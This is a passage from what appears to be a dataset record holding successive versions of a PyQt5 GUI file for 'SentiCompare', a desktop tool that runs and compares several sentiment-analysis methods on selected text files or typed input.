self.results_content.setObjectName('results_content')\n self.results_scroll_box.setWidget(self.results_content)\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName('results_content_text')\n self.input_output_box.addTab(self.results_tab, '')\n self.input_output_box.setTabEnabled(2, False)\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle('')\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n 
self.group_box_1.setObjectName('group_box_1')\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName('vertical_layout_widget_1')\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.\n vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName('vertical_layout_1')\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.pronoun_checkbox.setFont(font)\n self.pronoun_checkbox.setObjectName('pronoun_checkbox')\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n self.lexical_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName('lexical_checkbox')\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName('rule_based_checkbox')\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\n 'machine_learning_checkbox')\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName('help_scroll_box')\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName('help_content')\n self.help_scroll_box.setWidget(self.help_content)\n self.selected_files = {}\n self.input_output_box.setCurrentIndex(0)\n self.retranslateUI()\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n 
file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n def removeFiles(self):\n for i in range(self.file_view_model.rowCount() - 1, -1, -1):\n if self.file_view_model.item(i).checkState():\n filename = self.file_view_model.item(i).text()\n del self.selected_files[filename]\n self.file_view_model.removeRow(i)\n\n def run(self):\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.\n isChecked() or self.rule_based_checkbox.isChecked() or self.\n machine_learning_checkbox.isChecked()):\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Parameters')\n message_box.setText(\n \"You haven't selected any methods of sentiment analysis. Please select at least one \"\n + 'method from the list of options.')\n message_box.exec_()\n return\n if self.input_output_box.currentIndex() == 2:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Select Input')\n message_box.setText(\n 'You must be on the \"Select Files\" page or the \"Manual Input\" page to run '\n +\n 'an analysis. Please select one of those pages and try again.')\n message_box.exec_()\n return\n else:\n progress_bar = QtWidgets.QProgressDialog(\n 'Running Sentiment Analysis...', 'Cancel', 0, 100, self.\n main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files,\n progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(), rule_based=\n self.rule_based_checkbox.isChecked(), machine_learning=\n self.machine_learning_checkbox.isChecked())\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.\n toPlainText(), progress_bar, pronoun=self.\n pronoun_checkbox.isChecked(), lexical=self.\n lexical_checkbox.isChecked(), rule_based=self.\n rule_based_checkbox.isChecked(), machine_learning=self.\n machine_learning_checkbox.isChecked())\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Input')\n message_box.setText(\n \"You haven't added any input to analyze. Please select one or more files or \"\n + 'input some data manually.')\n message_box.exec_()\n return\n",
"step-4": "import os\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QStandardItem, QStandardItemModel\nfrom PyQt5.QtWidgets import QMessageBox\nfrom src import FileDialog, SentimentAnalyzer\n\n\nclass UIMainWindow(object):\n\n def __init__(self):\n font = QtGui.QFont()\n font.setFamily('Myriad Pro')\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName('main_window')\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,\n QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().\n hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText('')\n self.branding_icon.setPixmap(QtGui.QPixmap(\n '../images/senticompare_logo.png'))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.\n AlignVCenter)\n self.branding_icon.setObjectName('branding_icon')\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily('Optima')\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName('branding_label')\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, \n 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\n 'horizontal_layout_widget_1')\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName('horizontal_layout_1')\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1\n )\n self.run_button.setObjectName('run_button')\n self.run_button.clicked.connect(self.run)\n self.horizontal_layout_1.addWidget(self.run_button)\n self.quit_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_1)\n 
self.quit_button.setObjectName('quit_button')\n self.quit_button.clicked.connect(self.main_window.close)\n self.horizontal_layout_1.addWidget(self.quit_button)\n self.select_files_tab = QtWidgets.QWidget()\n self.select_files_tab.setObjectName('select_files_tab')\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.\n select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, \n 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\n 'horizontal_layout_widget_2')\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName('horizontal_layout_2')\n font.setFamily('Myriad Pro')\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.\n PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName('input_output_box')\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName('file_view')\n self.file_view_model = QStandardItemModel(self.file_view)\n self.file_view.setModel(self.file_view_model)\n self.file_view.show()\n self.input_output_box.addTab(self.select_files_tab, '')\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2\n )\n self.add_button.setFont(font)\n self.add_button.setObjectName('add_button')\n self.add_button.clicked.connect(self.selectFiles)\n self.horizontal_layout_2.addWidget(self.add_button)\n self.delete_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName('delete_button')\n self.delete_button.clicked.connect(self.removeFiles)\n self.horizontal_layout_2.addWidget(self.delete_button)\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName('manual_input_tab')\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName('text_input')\n self.input_output_box.addTab(self.manual_input_tab, '')\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName('results_tab')\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName('results_scroll_box')\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n self.results_content.setObjectName('results_content')\n self.results_scroll_box.setWidget(self.results_content)\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName('results_content_text')\n self.input_output_box.addTab(self.results_tab, '')\n self.input_output_box.setTabEnabled(2, False)\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 
160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle('')\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n self.group_box_1.setObjectName('group_box_1')\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName('vertical_layout_widget_1')\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.\n vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName('vertical_layout_1')\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.pronoun_checkbox.setFont(font)\n self.pronoun_checkbox.setObjectName('pronoun_checkbox')\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n self.lexical_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName('lexical_checkbox')\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName('rule_based_checkbox')\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\n 'machine_learning_checkbox')\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName('help_scroll_box')\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName('help_content')\n self.help_scroll_box.setWidget(self.help_content)\n self.selected_files = {}\n self.input_output_box.setCurrentIndex(0)\n self.retranslateUI()\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n 
self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n def removeFiles(self):\n for i in range(self.file_view_model.rowCount() - 1, -1, -1):\n if self.file_view_model.item(i).checkState():\n filename = self.file_view_model.item(i).text()\n del self.selected_files[filename]\n self.file_view_model.removeRow(i)\n\n def run(self):\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.\n isChecked() or self.rule_based_checkbox.isChecked() or self.\n machine_learning_checkbox.isChecked()):\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Parameters')\n message_box.setText(\n \"You haven't selected any methods of sentiment analysis. Please select at least one \"\n + 'method from the list of options.')\n message_box.exec_()\n return\n if self.input_output_box.currentIndex() == 2:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Select Input')\n message_box.setText(\n 'You must be on the \"Select Files\" page or the \"Manual Input\" page to run '\n +\n 'an analysis. Please select one of those pages and try again.')\n message_box.exec_()\n return\n else:\n progress_bar = QtWidgets.QProgressDialog(\n 'Running Sentiment Analysis...', 'Cancel', 0, 100, self.\n main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files,\n progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(), rule_based=\n self.rule_based_checkbox.isChecked(), machine_learning=\n self.machine_learning_checkbox.isChecked())\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.\n toPlainText(), progress_bar, pronoun=self.\n pronoun_checkbox.isChecked(), lexical=self.\n lexical_checkbox.isChecked(), rule_based=self.\n rule_based_checkbox.isChecked(), machine_learning=self.\n machine_learning_checkbox.isChecked())\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Input')\n message_box.setText(\n \"You haven't added any input to analyze. 
Please select one or more files or \"\n + 'input some data manually.')\n message_box.exec_()\n return\n",
"step-5": "# ================================================== #\n# MAIN WINDOW #\n# ================================================== #\n# Author: Brady Hammond #\n# Created: 11/21/2017 #\n# Last Edited: N/A #\n# Last Edited By: N/A #\n# ================================================== #\n# FILE SETUP #\n# ================================================== #\n\n\n# Import statements\nimport os\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QStandardItem, QStandardItemModel\nfrom PyQt5.QtWidgets import QMessageBox\nfrom src import FileDialog, SentimentAnalyzer\n\n\n# ================================================== #\n# CLASS DEFINITION #\n# ================================================== #\n\n\n# UIMainWindow class definition\nclass UIMainWindow(object):\n\n # Define __init__ function\n def __init__(self):\n # Create main window\n font = QtGui.QFont()\n font.setFamily(\"Myriad Pro\")\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName(\"main_window\")\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n\n # Create branding icon\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText(\"\")\n self.branding_icon.setPixmap(QtGui.QPixmap(\"../images/senticompare_logo.png\"))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.AlignVCenter)\n self.branding_icon.setObjectName(\"branding_icon\")\n\n # Create branding label\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(\"Optima\")\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName(\"branding_label\")\n\n # Create first horizontal layout\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n 
self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\"horizontal_layout_widget_1\")\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName(\"horizontal_layout_1\")\n\n # Create run button\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)\n self.run_button.setObjectName(\"run_button\")\n self.run_button.clicked.connect(self.run)\n\n # Add run button to first horizontal layout\n self.horizontal_layout_1.addWidget(self.run_button)\n\n # Create quit button\n self.quit_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)\n self.quit_button.setObjectName(\"quit_button\")\n self.quit_button.clicked.connect(self.main_window.close)\n\n # Add quit button to first horizontal layout\n self.horizontal_layout_1.addWidget(self.quit_button)\n\n # Create file selection tab\n self.select_files_tab = QtWidgets.QWidget()\n self.select_files_tab.setObjectName(\"select_files_tab\")\n\n # Create second horizontal layout\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\"horizontal_layout_widget_2\")\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName(\"horizontal_layout_2\")\n\n # Create input/output tab window\n font.setFamily(\"Myriad Pro\")\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName(\"input_output_box\")\n\n # Create file view\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName(\"file_view\")\n\n # Create file view model\n self.file_view_model = QStandardItemModel(self.file_view)\n\n # Add file view model to file view\n self.file_view.setModel(self.file_view_model)\n\n # Show file view\n self.file_view.show()\n\n # Add file selection tab to input/output tab window\n self.input_output_box.addTab(self.select_files_tab, \"\")\n\n # Create add button\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)\n self.add_button.setFont(font)\n self.add_button.setObjectName(\"add_button\")\n self.add_button.clicked.connect(self.selectFiles)\n\n # Add add button to second horizontal layout\n self.horizontal_layout_2.addWidget(self.add_button)\n\n # Create delete button\n self.delete_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName(\"delete_button\")\n self.delete_button.clicked.connect(self.removeFiles)\n\n # Add delete button to second horizontal layout\n self.horizontal_layout_2.addWidget(self.delete_button)\n\n # Create manual input tab\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName(\"manual_input_tab\")\n\n # Create text 
input\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName(\"text_input\")\n\n # Add text input to manual input tab\n self.input_output_box.addTab(self.manual_input_tab, \"\")\n\n # Create results tab\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName(\"results_tab\")\n\n # Create results scroll box\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName(\"results_scroll_box\")\n\n # Create results content\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n self.results_content.setObjectName(\"results_content\")\n self.results_scroll_box.setWidget(self.results_content)\n\n # Create results content text\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName(\"results_content_text\")\n\n # Add results tab to input/output tab window\n self.input_output_box.addTab(self.results_tab, \"\")\n\n # Disable results tab\n self.input_output_box.setTabEnabled(2, False)\n\n # Create first group box\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle(\"\")\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n self.group_box_1.setObjectName(\"group_box_1\")\n\n # Create first vertical layout\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName(\"vertical_layout_widget_1\")\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName(\"vertical_layout_1\")\n\n # Create pronoun checkbox\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n 